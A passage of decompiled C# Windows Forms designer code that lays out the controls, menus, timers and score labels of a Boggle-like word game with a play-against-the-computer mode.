= size1; lbl10_2.Size = size18; this.lbl10.TabIndex = 28; this.lbl10.Tag = (object) "12"; this.lbl11.BackColor = System.Drawing.Color.LightGray; this.lbl11.CubeHighLight = System.Drawing.Color.LightGray; this.lbl11.CubeText = "W"; this.lbl11.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl11.CubeTopRadius = 55L; CircleLabel lbl11_1 = this.lbl11; point1 = new Point(537, 339); Point point19 = point1; lbl11_1.Location = point19; this.lbl11.Name = "lbl11"; CircleLabel lbl11_2 = this.lbl11; size1 = new Size(55, 55); Size size19 = size1; lbl11_2.Size = size19; this.lbl11.TabIndex = 29; this.lbl11.Tag = (object) "22"; this.lbl12.BackColor = System.Drawing.Color.LightGray; this.lbl12.CubeHighLight = System.Drawing.Color.LightGray; this.lbl12.CubeText = "W"; this.lbl12.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl12.CubeTopRadius = 55L; CircleLabel lbl12_1 = this.lbl12; point1 = new Point(613, 338); Point point20 = point1; lbl12_1.Location = point20; this.lbl12.Name = "lbl12"; CircleLabel lbl12_2 = this.lbl12; size1 = new Size(55, 55); Size size20 = size1; lbl12_2.Size = size20; this.lbl12.TabIndex = 30; this.lbl12.Tag = (object) "32"; this.lbl13.BackColor = System.Drawing.Color.LightGray; this.lbl13.CubeHighLight = System.Drawing.Color.LightGray; this.lbl13.CubeText = "W"; this.lbl13.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl13.CubeTopRadius = 55L; CircleLabel lbl13_1 = this.lbl13; point1 = new Point(389, 415); Point point21 = point1; lbl13_1.Location = point21; this.lbl13.Name = "lbl13"; CircleLabel lbl13_2 = this.lbl13; size1 = new Size(55, 55); Size size21 = size1; lbl13_2.Size = size21; this.lbl13.TabIndex = 31; this.lbl13.Tag = (object) "03"; this.lbl14.BackColor = System.Drawing.Color.LightGray; this.lbl14.CubeHighLight = System.Drawing.Color.LightGray; this.lbl14.CubeText = "W"; this.lbl14.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl14.CubeTopRadius = 55L; CircleLabel lbl14_1 = this.lbl14; point1 = new Point(463, 412); Point point22 = point1; lbl14_1.Location = point22; this.lbl14.Name = "lbl14"; CircleLabel lbl14_2 = this.lbl14; size1 = new Size(55, 55); Size size22 = size1; lbl14_2.Size = size22; this.lbl14.TabIndex = 32; this.lbl14.Tag = (object) "13"; this.lbl15.BackColor = System.Drawing.Color.LightGray; this.lbl15.CubeHighLight = System.Drawing.Color.LightGray; this.lbl15.CubeText = "W"; this.lbl15.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl15.CubeTopRadius = 55L; CircleLabel lbl15_1 = this.lbl15; point1 = new Point(542, 413); Point point23 = point1; lbl15_1.Location = point23; this.lbl15.Name = "lbl15"; CircleLabel lbl15_2 = this.lbl15; size1 = new Size(55, 55); Size size23 = size1; lbl15_2.Size = size23; this.lbl15.TabIndex = 33; this.lbl15.Tag = (object) "23"; this.lbl16.BackColor = System.Drawing.Color.LightGray; this.lbl16.CubeHighLight = System.Drawing.Color.LightGray; this.lbl16.CubeText = "W"; this.lbl16.CubeTextColor = System.Drawing.Color.DarkBlue; this.lbl16.CubeTopRadius = 55L; CircleLabel lbl16_1 = this.lbl16; point1 = new Point(613, 414); Point point24 = point1; lbl16_1.Location = point24; this.lbl16.Name = "lbl16"; CircleLabel lbl16_2 = this.lbl16; size1 = new Size(55, 55); Size size24 = size1; lbl16_2.Size = size24; this.lbl16.TabIndex = 34; this.lbl16.Tag = (object) "33"; this.picCubeDown.BackColor = System.Drawing.Color.FromArgb(0, 0, 192); PictureBox picCubeDown1 = this.picCubeDown; point1 = new Point(693, 189); Point point25 = point1; picCubeDown1.Location = point25; this.picCubeDown.Name = "picCubeDown"; PictureBox picCubeDown2 = this.picCubeDown; size1 = new Size(74, 75); Size size25 = size1; picCubeDown2.Size = size25; this.picCubeDown.TabIndex = 35; this.picCubeDown.TabStop = false; this.btnAddWord.BogButtonEnabled = false; this.btnAddWord.ButtonText = "Add Word"; BogButton btnAddWord1 = this.btnAddWord; point1 = new Point(187, 180); Point point26 = point1; btnAddWord1.Location = point26; this.btnAddWord.Name = "btnAddWord"; BogButton btnAddWord2 = this.btnAddWord; size1 = new Size(93, 49); Size size26 = size1; btnAddWord2.Size = size26; this.btnAddWord.TabIndex = 36; this.btnAddWord.Tag = (object) "Continue"; this.btnAddWord.Text = "Add Word"; this.lstHumanWordsFound.BackColor = System.Drawing.Color.Black; this.lstHumanWordsFound.BorderStyle = BorderStyle.None; this.lstHumanWordsFound.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lstHumanWordsFound.ForeColor = System.Drawing.Color.DodgerBlue; ListBox lstHumanWordsFound1 = this.lstHumanWordsFound; point1 = new Point(58, 381); Point point27 = point1; lstHumanWordsFound1.Location = point27; this.lstHumanWordsFound.Name = "lstHumanWordsFound"; ListBox lstHumanWordsFound2 = this.lstHumanWordsFound; size1 = new Size(81, 234); Size size27 = size1; lstHumanWordsFound2.Size = size27; this.lstHumanWordsFound.TabIndex = 40; this.mnuMain.MenuItems.AddRange(new MenuItem[3] { this.mnuGame, this.mnuOptions, this.mnuHelp }); this.mnuGame.Enabled = false; this.mnuGame.Index = 0; this.mnuGame.MenuItems.AddRange(new MenuItem[6] { this.mnuNewGame, this.mnuEndGame, this.MenuItem8, this.mnuHighScores, this.MenuItem2, this.mnuExitGame }); this.mnuGame.Text = "&Game"; this.mnuNewGame.Index = 0; this.mnuNewGame.Text = "New Game..."; this.mnuEndGame.Index = 1; this.mnuEndGame.Text = "End Game"; this.MenuItem8.Index = 2; this.MenuItem8.Text = "-"; this.mnuHighScores.Index = 3; this.mnuHighScores.Text = "High Scores..."; this.MenuItem2.Index = 4; this.MenuItem2.Text = "-"; this.mnuExitGame.Index = 5; this.mnuExitGame.Text = "Exit "; this.mnuOptions.Enabled = false; this.mnuOptions.Index = 1; this.mnuOptions.MenuItems.AddRange(new MenuItem[13] { this.mnuEnableDefSearch, this.MenuItem1, this.mnuMode, this.MenuItem3, this.mnuLevelEasy, this.mnuLevelMedium, this.mnuLevelHard, this.mnuLevelImpossible, this.MenuItem4, this.mnuTimerInterval, this.mnuEnableTimerFlash, this.MenuItem5, this.mnuEnableWordValidation }); this.mnuOptions.Text = "&Options"; this.mnuEnableDefSearch.Index = 0; this.mnuEnableDefSearch.Text = "Enable Defention Search"; this.MenuItem1.Index = 1; this.MenuItem1.Text = "-"; this.mnuMode.Index = 2; this.mnuMode.MenuItems.AddRange(new MenuItem[3] { this.mnuBoardGameMode, this.mnuVsMode, this.mnuTeachingMode }); this.mnuMode.Text = "Mode..."; this.mnuBoardGameMode.Index = 0; this.mnuBoardGameMode.Text = "Board Game Mode"; this.mnuVsMode.Index = 1; this.mnuVsMode.Text = "Vs. Computer Mode"; this.mnuTeachingMode.Index = 2; this.mnuTeachingMode.Text = "Teaching Mode"; this.MenuItem3.Index = 3; this.MenuItem3.Text = "-"; this.mnuLevelEasy.Index = 4; this.mnuLevelEasy.Text = "Level Easy"; this.mnuLevelMedium.Index = 5; this.mnuLevelMedium.Text = "Level Medium"; this.mnuLevelHard.Index = 6; this.mnuLevelHard.Text = "Level Hard"; this.mnuLevelImpossible.Index = 7; this.mnuLevelImpossible.Text = "Level Impossible "; this.MenuItem4.Index = 8; this.MenuItem4.Text = "-"; this.mnuTimerInterval.Index = 9; this.mnuTimerInterval.MenuItems.AddRange(new MenuItem[10] { this.mnuTmr30, this.mnuTmr100, this.mnuTmr130, this.mnuTmr200, this.mnuTmr230, this.mnuTmr300, this.mnuTmr330, this.mnuTmr400, this.mnuTmr430, this.mnuTmr500 }); this.mnuTimerInterval.Text = "Timer Interval..."; this.mnuTmr30.Index = 0; this.mnuTmr30.Text = ":30"; this.mnuTmr100.Index = 1; this.mnuTmr100.Text = "1:00"; this.mnuTmr130.Index = 2; this.mnuTmr130.Text = "1:30"; this.mnuTmr200.Index = 3; this.mnuTmr200.Text = "2:00"; this.mnuTmr230.Index = 4; this.mnuTmr230.Text = "2:30"; this.mnuTmr300.Index = 5; this.mnuTmr300.Text = "3:00"; this.mnuTmr330.Index = 6; this.mnuTmr330.Text = "3:30"; this.mnuTmr400.Index = 7; this.mnuTmr400.Text = "4:00"; this.mnuTmr430.Index = 8; this.mnuTmr430.Text = "4:30"; this.mnuTmr500.Index = 9; this.mnuTmr500.Text = "5:00"; this.mnuEnableTimerFlash.Index = 10; this.mnuEnableTimerFlash.Text = "Enable Timer Flash"; this.MenuItem5.Index = 11; this.MenuItem5.Text = "-"; this.mnuEnableWordValidation.Index = 12; this.mnuEnableWordValidation.Text = "Enable Word Validation"; this.mnuHelp.Enabled = false; this.mnuHelp.Index = 2; this.mnuHelp.MenuItems.AddRange(new MenuItem[3] { this.mnuAbout, this.MenuItem6, this.mnuTips }); this.mnuHelp.Text = "&Help"; this.mnuAbout.Index = 0; this.mnuAbout.Text = "About..."; this.MenuItem6.Index = 1; this.MenuItem6.Text = "-"; this.mnuTips.Index = 2; this.mnuTips.Text = "Tips..."; this.tmrContMain.Enabled = true; this.tmrContMain.Interval = 500; this.txtWordFound.BackColor = System.Drawing.Color.Silver; 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this.lblHumanScore.Name = "lblHumanScore"; Label lblHumanScore2 = this.lblHumanScore; size1 = new Size(80, 19); Size size29 = size1; lblHumanScore2.Size = size29; this.lblHumanScore.TabIndex = 42; this.lblHumanScore.Text = "0"; this.Panel1.BackColor = System.Drawing.Color.Black; Panel panel1_1 = this.Panel1; point1 = new Point(365, 75); Point point30 = point1; panel1_1.Location = point30; this.Panel1.Name = "Panel1"; Panel panel1_2 = this.Panel1; size1 = new Size(17, 97); Size size30 = size1; panel1_2.Size = size30; this.Panel1.TabIndex = 43; this.pnlScore.BackColor = System.Drawing.Color.DarkGray; BogPanel pnlScore1 = this.pnlScore; point1 = new Point(-3, 161); Point point31 = point1; pnlScore1.Location = point31; this.pnlScore.Name = "pnlScore"; BogPanel pnlScore2 = this.pnlScore; size1 = new Size(318, 174); Size size31 = size1; pnlScore2.Size = size31; this.pnlScore.TabIndex = 46; this.pnlScore.TabStop = false; this.pnlWords.BackColor = System.Drawing.Color.DarkGray; BogPanel pnlWords1 = this.pnlWords; point1 = new Point(-5, 331); Point point32 = point1; pnlWords1.Location = point32; this.pnlWords.Name = "pnlWords"; BogPanel pnlWords2 = this.pnlWords; size1 = new Size(318, 315); Size size32 = size1; pnlWords2.Size = size32; this.pnlWords.TabIndex = 47; this.pnlWords.TabStop = false; this.BogBorder9.BackColor = System.Drawing.Color.DarkGray; this.BogBorder9.BorderDirection = BogBorder.Direction.Left; BogBorder bogBorder9_1 = this.BogBorder9; point1 = new Point(48, 370); Point point33 = point1; bogBorder9_1.Location = point33; this.BogBorder9.Name = "BogBorder9"; BogBorder bogBorder9_2 = this.BogBorder9; size1 = new Size(12, 258); Size size33 = size1; bogBorder9_2.Size = size33; this.BogBorder9.TabIndex = 48; this.BogBorder9.TabStop = false; this.BogBorder10.BackColor = System.Drawing.Color.DarkGray; this.BogBorder10.BorderDirection = BogBorder.Direction.Right; BogBorder bogBorder10_1 = this.BogBorder10; point1 = new Point(139, 372); Point point34 = point1; bogBorder10_1.Location = point34; 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size1 = new Size(81, 11); Size size36 = size1; bogBorder12_2.Size = size36; this.BogBorder12.TabIndex = 51; this.BogBorder12.TabStop = false; this.BogBorder13.BackColor = System.Drawing.Color.DarkGray; this.BogBorder13.BorderDirection = BogBorder.Direction.Bottom; BogBorder bogBorder13_1 = this.BogBorder13; point1 = new Point(170, 614); Point point37 = point1; bogBorder13_1.Location = point37; this.BogBorder13.Name = "BogBorder13"; BogBorder bogBorder13_2 = this.BogBorder13; size1 = new Size(81, 11); Size size37 = size1; bogBorder13_2.Size = size37; this.BogBorder13.TabIndex = 56; this.BogBorder13.TabStop = false; this.BogBorder14.BackColor = System.Drawing.Color.DarkGray; this.BogBorder14.BorderDirection = BogBorder.Direction.Top; BogBorder bogBorder14_1 = this.BogBorder14; point1 = new Point(170, 371); Point point38 = point1; bogBorder14_1.Location = point38; this.BogBorder14.Name = "BogBorder14"; BogBorder bogBorder14_2 = this.BogBorder14; size1 = new Size(80, 11); Size size38 = size1; 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this.BogBorder16.TabStop = false; this.lstCompFoundWords.BackColor = System.Drawing.Color.Black; this.lstCompFoundWords.BorderStyle = BorderStyle.None; this.lstCompFoundWords.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lstCompFoundWords.ForeColor = System.Drawing.Color.DodgerBlue; ListBox lstCompFoundWords1 = this.lstCompFoundWords; point1 = new Point(168, 380); Point point41 = point1; lstCompFoundWords1.Location = point41; this.lstCompFoundWords.Name = "lstCompFoundWords"; ListBox lstCompFoundWords2 = this.lstCompFoundWords; size1 = new Size(81, 234); Size size41 = size1; lstCompFoundWords2.Size = size41; this.lstCompFoundWords.TabIndex = 52; this.tmrBtn1.BackColor = System.Drawing.Color.Gray; Button tmrBtn1_1 = this.tmrBtn1; point1 = new Point(89, 132); Point point42 = point1; tmrBtn1_1.Location = point42; this.tmrBtn1.Name = "tmrBtn1"; Button tmrBtn1_2 = this.tmrBtn1; size1 = new Size(21, 12); Size size42 = size1; tmrBtn1_2.Size = size42; this.tmrBtn1.TabIndex = 57; this.tmrBtn2.BackColor = System.Drawing.Color.Gray; Button tmrBtn2_1 = this.tmrBtn2; point1 = new Point(126, 132); Point point43 = point1; tmrBtn2_1.Location = point43; this.tmrBtn2.Name = "tmrBtn2"; Button tmrBtn2_2 = this.tmrBtn2; size1 = new Size(21, 12); Size size43 = size1; tmrBtn2_2.Size = size43; this.tmrBtn2.TabIndex = 58; this.tmrBtn3.BackColor = System.Drawing.Color.Gray; Button tmrBtn3_1 = this.tmrBtn3; point1 = new Point(198, 132); Point point44 = point1; tmrBtn3_1.Location = point44; this.tmrBtn3.Name = "tmrBtn3"; Button tmrBtn3_2 = this.tmrBtn3; size1 = new Size(21, 12); Size size44 = size1; tmrBtn3_2.Size = size44; this.tmrBtn3.TabIndex = 59; this.tmrBtn4.BackColor = System.Drawing.Color.Gray; Button tmrBtn4_1 = this.tmrBtn4; point1 = new Point(162, 132); Point point45 = point1; tmrBtn4_1.Location = point45; this.tmrBtn4.Name = "tmrBtn4"; Button tmrBtn4_2 = this.tmrBtn4; size1 = new Size(21, 12); Size size45 = size1; tmrBtn4_2.Size = size45; this.tmrBtn4.TabIndex = 60; this.Label1.AutoSize = true; this.Label1.BackColor = System.Drawing.Color.DarkGray; this.Label1.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label1.ForeColor = System.Drawing.Color.Black; Label label1_1 = this.Label1; point1 = new Point(65, 357); Point point46 = point1; label1_1.Location = point46; this.Label1.Name = "Label1"; Label label1_2 = this.Label1; size1 = new Size(66, 13); Size size46 = size1; label1_2.Size = size46; this.Label1.TabIndex = 61; this.Label1.Text = "Your Words"; this.Label2.AutoSize = true; this.Label2.BackColor = System.Drawing.Color.DarkGray; this.Label2.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label2.ForeColor = System.Drawing.Color.Black; Label label2_1 = this.Label2; point1 = new Point(179, 357); Point point47 = point1; label2_1.Location = point47; this.Label2.Name = "Label2"; Label label2_2 = this.Label2; size1 = new Size(57, 13); Size size47 = size1; label2_2.Size = size47; this.Label2.TabIndex = 62; this.Label2.Text = "My Words"; this.lblCompScore.BackColor = System.Drawing.Color.Silver; this.lblCompScore.BorderStyle = BorderStyle.FixedSingle; this.lblCompScore.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lblCompScore.ForeColor = System.Drawing.Color.FromArgb(0, 0, 192); Label lblCompScore1 = this.lblCompScore; point1 = new Point(35, 289); Point point48 = point1; lblCompScore1.Location = point48; this.lblCompScore.Name = "lblCompScore"; Label lblCompScore2 = this.lblCompScore; size1 = new Size(80, 19); Size size48 = size1; lblCompScore2.Size = size48; this.lblCompScore.TabIndex = 63; this.lblCompScore.Text = "0"; this.Label3.AutoSize = true; this.Label3.BackColor = System.Drawing.Color.DarkGray; this.Label3.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label3.ForeColor = System.Drawing.Color.Black; Label label3_1 = this.Label3; point1 = new Point(35, 229); Point point49 = point1; label3_1.Location = point49; this.Label3.Name = "Label3"; Label label3_2 = this.Label3; size1 = new Size(63, 13); Size size49 = size1; label3_2.Size = size49; this.Label3.TabIndex = 64; this.Label3.Text = "Your Score"; this.Label4.AutoSize = true; this.Label4.BackColor = System.Drawing.Color.DarkGray; this.Label4.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label4.ForeColor = System.Drawing.Color.Black; Label label4_1 = this.Label4; point1 = new Point(35, 272); Point point50 = point1; label4_1.Location = point50; this.Label4.Name = "Label4"; Label label4_2 = this.Label4; size1 = new Size(54, 13); Size size50 = size1; label4_2.Size = size50; this.Label4.TabIndex = 65; this.Label4.Text = "My Score"; this.Label5.AutoSize = true; this.Label5.BackColor = System.Drawing.Color.DarkGray; this.Label5.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label5.ForeColor = System.Drawing.Color.Black; Label label5_1 = this.Label5; point1 = new Point(35, 187); Point point51 = point1; label5_1.Location = point51; this.Label5.Name = "Label5"; Label label5_2 = this.Label5; size1 = new Size(56, 13); Size size51 = size1; label5_2.Size = size51; this.Label5.TabIndex = 66; this.Label5.Text = "Add Word"; this.lblHumanWordsCount.BackColor = System.Drawing.Color.DarkGray; this.lblHumanWordsCount.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lblHumanWordsCount.ForeColor = System.Drawing.Color.Blue; Label lblHumanWordsCount1 = this.lblHumanWordsCount; point1 = new Point(25, 378); Point point52 = point1; lblHumanWordsCount1.Location = point52; this.lblHumanWordsCount.Name = "lblHumanWordsCount"; Label lblHumanWordsCount2 = this.lblHumanWordsCount; size1 = new Size(21, 19); Size size52 = size1; lblHumanWordsCount2.Size = size52; this.lblHumanWordsCount.TabIndex = 67; this.lblHumanWordsCount.Text = "0"; this.lblCompWordsCount.BackColor = System.Drawing.Color.DarkGray; this.lblCompWordsCount.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lblCompWordsCount.ForeColor = System.Drawing.Color.Blue; Label lblCompWordsCount1 = this.lblCompWordsCount; point1 = new Point(271, 378); Point point53 = point1; lblCompWordsCount1.Location = point53; this.lblCompWordsCount.Name = "lblCompWordsCount"; Label lblCompWordsCount2 = this.lblCompWordsCount; size1 = new Size(21, 19); Size size53 = size1; lblCompWordsCount2.Size = size53; this.lblCompWordsCount.TabIndex = 68; this.lblCompWordsCount.Text = "0"; this.btnContinue.BogButtonEnabled = false; this.btnContinue.ButtonText = "Continue"; BogButton btnContinue1 = this.btnContinue; point1 = new Point(187, 223); Point point54 = point1; btnContinue1.Location = point54; this.btnContinue.Name = "btnContinue"; BogButton btnContinue2 = this.btnContinue; size1 = new Size(93, 49); Size size54 = size1; btnContinue2.Size = size54; this.btnContinue.TabIndex = 69; this.btnContinue.Text = "Continue"; this.btnScramble.BogButtonEnabled = false; this.btnScramble.ButtonText = "Scramble"; BogButton btnScramble1 = this.btnScramble; point1 = new Point(187, 265); Point point55 = point1; btnScramble1.Location = point55; this.btnScramble.Name = "btnScramble"; BogButton btnScramble2 = this.btnScramble; size1 = new Size(93, 49); Size size55 = size1; btnScramble2.Size = size55; this.btnScramble.TabIndex = 70; this.btnScramble.Text = "Add Word"; this.btnFinish.BogButtonEnabled = false; this.btnFinish.ButtonText = " Finish "; BogButton btnFinish1 = this.btnFinish; point1 = new Point(548, 595); Point point56 = point1; btnFinish1.Location = point56; this.btnFinish.Name = "btnFinish"; BogButton btnFinish2 = this.btnFinish; size1 = new Size(96, 49); Size size56 = size1; btnFinish2.Size = size56; this.btnFinish.TabIndex = 73; this.btnFinish.Text = "btnFinish"; this.lblHumanRounds.BackColor = System.Drawing.Color.Silver; this.lblHumanRounds.BorderStyle = BorderStyle.FixedSingle; this.lblHumanRounds.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lblHumanRounds.ForeColor = System.Drawing.Color.FromArgb(0, 0, 192); Label lblHumanRounds1 = this.lblHumanRounds; point1 = new Point(121, 244); Point point57 = point1; lblHumanRounds1.Location = point57; this.lblHumanRounds.Name = "lblHumanRounds"; Label lblHumanRounds2 = this.lblHumanRounds; size1 = new Size(29, 19); Size size57 = size1; lblHumanRounds2.Size = size57; this.lblHumanRounds.TabIndex = 74; this.lblHumanRounds.Text = "0"; this.lblComputerRounds.BackColor = System.Drawing.Color.Silver; this.lblComputerRounds.BorderStyle = BorderStyle.FixedSingle; this.lblComputerRounds.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.lblComputerRounds.ForeColor = System.Drawing.Color.FromArgb(0, 0, 192); Label lblComputerRounds1 = this.lblComputerRounds; point1 = new Point(121, 289); Point point58 = point1; lblComputerRounds1.Location = point58; this.lblComputerRounds.Name = "lblComputerRounds"; Label lblComputerRounds2 = this.lblComputerRounds; size1 = new Size(29, 19); Size size58 = size1; lblComputerRounds2.Size = size58; this.lblComputerRounds.TabIndex = 75; this.lblComputerRounds.Text = "0"; this.Label7.AutoSize = true; this.Label7.BackColor = System.Drawing.Color.DarkGray; this.Label7.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label7.ForeColor = System.Drawing.Color.Black; Label label7_1 = this.Label7; point1 = new Point(121, 230); Point point59 = point1; label7_1.Location = point59; this.Label7.Name = "Label7"; Label label7_2 = this.Label7; size1 = new Size(45, 13); Size size59 = size1; label7_2.Size = size59; this.Label7.TabIndex = 76; this.Label7.Text = "Rounds"; this.Label8.AutoSize = true; this.Label8.BackColor = System.Drawing.Color.DarkGray; this.Label8.Font = new Font("Microsoft Sans Serif", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.Label8.ForeColor = System.Drawing.Color.Black; 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this.Label6.ForeColor = System.Drawing.Color.Blue; Label label6_1 = this.Label6; point1 = new Point(543, 31); Point point62 = point1; label6_1.Location = point62; this.Label6.Name = "Label6"; Label label6_2 = this.Label6; size1 = new Size(53, 15); Size size62 = size1; label6_2.Size = size62; this.Label6.TabIndex = 71; this.Label6.Text = "Round: "; this.BogBorder5.BackColor = System.Drawing.Color.DarkGray; this.BogBorder5.BorderDirection = BogBorder.Direction.Left; BogBorder bogBorder5_1 = this.BogBorder5; point1 = new Point(356, 44); Point point63 = point1; bogBorder5_1.Location = point63; this.BogBorder5.Name = "BogBorder5"; BogBorder bogBorder5_2 = this.BogBorder5; size1 = new Size(11, 556); Size size63 = size1; bogBorder5_2.Size = size63; this.BogBorder5.TabIndex = 13; this.BogBorder5.TabStop = false; this.Panel3.BackColor = System.Drawing.Color.Black; Panel panel3_1 = this.Panel3; point1 = new Point(365, 57); Point point64 = point1; panel3_1.Location = point64; this.Panel3.Name = "Panel3"; Panel panel3_2 = this.Panel3; size1 = new Size(430, 18); Size size64 = size1; panel3_2.Size = size64; this.Panel3.TabIndex = 45; this.Panel2.BackColor = System.Drawing.Color.Black; Panel panel2_1 = this.Panel2; point1 = new Point(780, 72); Point point65 = point1; panel2_1.Location = point65; this.Panel2.Name = "Panel2"; Panel panel2_2 = this.Panel2; size1 = new Size(15, 100); Size size65 = size1; panel2_2.Size = size65; this.Panel2.TabIndex = 44; this.txtMain.BackColor = System.Drawing.Color.Black; this.txtMain.BorderStyle = BorderStyle.None; this.txtMain.Font = new Font("Microsoft Sans Serif", 9.75f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0); this.txtMain.ForeColor = System.Drawing.Color.DodgerBlue; RichTextBox txtMain1 = this.txtMain; point1 = new Point(381, 75); Point point66 = point1; txtMain1.Location = point66; this.txtMain.Name = "txtMain"; RichTextBox txtMain2 = this.txtMain; size1 = new Size(399, 99); Size size66 = size1; txtMain2.Size = size66; this.txtMain.TabIndex = 18; this.txtMain.Text = ""; this.BogBorder4.BackColor = System.Drawing.Color.DarkGray; this.BogBorder4.BorderDirection = BogBorder.Direction.Bottom; BogBorder bogBorder4_1 = this.BogBorder4; point1 = new Point(367, 589); Point point67 = point1; bogBorder4_1.Location = point67; this.BogBorder4.Name = "BogBorder4"; BogBorder bogBorder4_2 = this.BogBorder4; size1 = new Size(428, 10); Size size67 = size1; bogBorder4_2.Size = size67; this.BogBorder4.TabIndex = 12; this.BogBorder4.TabStop = false; this.BogBorder3.BackColor = System.Drawing.Color.DarkGray; this.BogBorder3.BorderDirection = BogBorder.Direction.Right; BogBorder bogBorder3_1 = this.BogBorder3; point1 = new Point(795, 47); Point point68 = point1; bogBorder3_1.Location = point68; this.BogBorder3.Name = "BogBorder3"; BogBorder bogBorder3_2 = this.BogBorder3; size1 = new Size(11, 552); Size size68 = size1; bogBorder3_2.Size = size68; this.BogBorder3.TabIndex = 11; this.BogBorder3.TabStop = false; this.BogBorder1.BackColor = System.Drawing.Color.DarkGray; this.BogBorder1.BorderDirection = BogBorder.Direction.Top; BogBorder bogBorder1_1 = this.BogBorder1; point1 = new Point(367, 46); Point point69 = point1; bogBorder1_1.Location = point69; this.BogBorder1.Name = "BogBorder1"; BogBorder bogBorder1_2 = this.BogBorder1; size1 = new Size(428, 12); Size size69 = size1; bogBorder1_2.Size = size69; this.BogBorder1.TabIndex = 9; this.BogBorder1.TabStop = false; this.picCubesUp.BackColor = System.Drawing.Color.Black; PictureBox picCubesUp1 = this.picCubesUp; point1 = new Point(365, 172); Point point70 = point1; picCubesUp1.Location = point70; this.picCubesUp.Name = "picCubesUp"; PictureBox picCubesUp2 = this.picCubesUp; size1 = new Size(430, 417); Size size70 = size1; picCubesUp2.Size = size70; this.picCubesUp.TabIndex = 5; this.picCubesUp.TabStop = false; this.CircleLabel1.BackColor = System.Drawing.Color.LightGray; this.CircleLabel1.CubeHighLight = System.Drawing.Color.LightGray; this.CircleLabel1.CubeText = "W"; this.CircleLabel1.CubeTextColor = System.Drawing.Color.DarkBlue; this.CircleLabel1.CubeTopRadius = 55L; CircleLabel circleLabel1_1 = this.CircleLabel1; point1 = new Point(394, 415); Point point71 = point1; circleLabel1_1.Location = point71; this.CircleLabel1.Name = "CircleLabel1"; CircleLabel circleLabel1_2 = this.CircleLabel1; size1 = new Size(55, 55); Size size71 = size1; circleLabel1_2.Size = size71; this.CircleLabel1.TabIndex = 31; this.CircleLabel1.Tag = (object) "03"; this.CircleLabel2.BackColor = System.Drawing.Color.LightGray; this.CircleLabel2.CubeHighLight = System.Drawing.Color.LightGray; this.CircleLabel2.CubeText = "W"; this.CircleLabel2.CubeTextColor = System.Drawing.Color.DarkBlue; this.CircleLabel2.CubeTopRadius = 55L; CircleLabel circleLabel2_1 = this.CircleLabel2; point1 = new Point(398, 340); Point point72 = point1; circleLabel2_1.Location = point72; this.CircleLabel2.Name = "CircleLabel2"; CircleLabel circleLabel2_2 = this.CircleLabel2; size1 = new Size(55, 55); Size size72 = size1; circleLabel2_2.Size = size72; this.CircleLabel2.TabIndex = 27; this.CircleLabel2.Tag = (object) "02"; this.CircleLabel3.BackColor = System.Drawing.Color.LightGray; this.CircleLabel3.CubeHighLight = System.Drawing.Color.LightGray; this.CircleLabel3.CubeText = "W"; this.CircleLabel3.CubeTextColor = System.Drawing.Color.DarkBlue; this.CircleLabel3.CubeTopRadius = 55L; CircleLabel circleLabel3_1 = this.CircleLabel3; point1 = new Point(468, 412); Point point73 = point1; circleLabel3_1.Location = point73; this.CircleLabel3.Name = "CircleLabel3"; CircleLabel circleLabel3_2 = this.CircleLabel3; size1 = new Size(55, 55); Size size73 = size1; circleLabel3_2.Size = size73; this.CircleLabel3.TabIndex = 32; this.CircleLabel3.Tag = (object) "13"; this.PictureBox1.BackColor = System.Drawing.Color.Black; PictureBox pictureBox1_1 = this.PictureBox1; point1 = new Point(370, 172); Point point74 = point1; pictureBox1_1.Location = point74; this.PictureBox1.Name = "PictureBox1"; PictureBox pictureBox1_2 = this.PictureBox1; size1 = new Size(430, 417); Size size74 = size1; pictureBox1_2.Size = size74; this.PictureBox1.TabIndex = 5; this.PictureBox1.TabStop = false; size1 = new Size(5, 13); this.AutoScaleBaseSize = size1; this.BackColor = System.Drawing.Color.Black; size1 = new Size(848, 646); this.ClientSize = size1; this.Controls.AddRange(new Control[73] { (Control) this.lblCompWordsCount, (Control) this.lblHumanWordsCount, (Control) this.Label2, (Control) this.Label1, (Control) this.Label8, (Control) this.Label7, (Control) this.Label5, (Control) this.Label4, (Control) this.Label3, (Control) this.lblRound, (Control) this.Label6, (Control) this.BogBorder13, (Control) this.BogBorder14, (Control) this.BogBorder15, (Control) this.BogBorder16, (Control) this.lstCompFoundWords, (Control) this.BogBorder12, (Control) this.BogBorder11, (Control) this.BogBorder10, (Control) this.BogBorder9, (Control) this.lstHumanWordsFound, (Control) this.lblComputerRounds, (Control) this.lblHumanRounds, (Control) this.lblCompScore, (Control) this.lblHumanScore, (Control) this.txtWordFound, (Control) this.btnScramble, (Control) this.btnContinue, (Control) this.btnAddWord, (Control) this.tmrBtn4, (Control) this.tmrBtn3, (Control) this.tmrBtn2, (Control) this.tmrBtn1, (Control) this.BogBorder8, (Control) 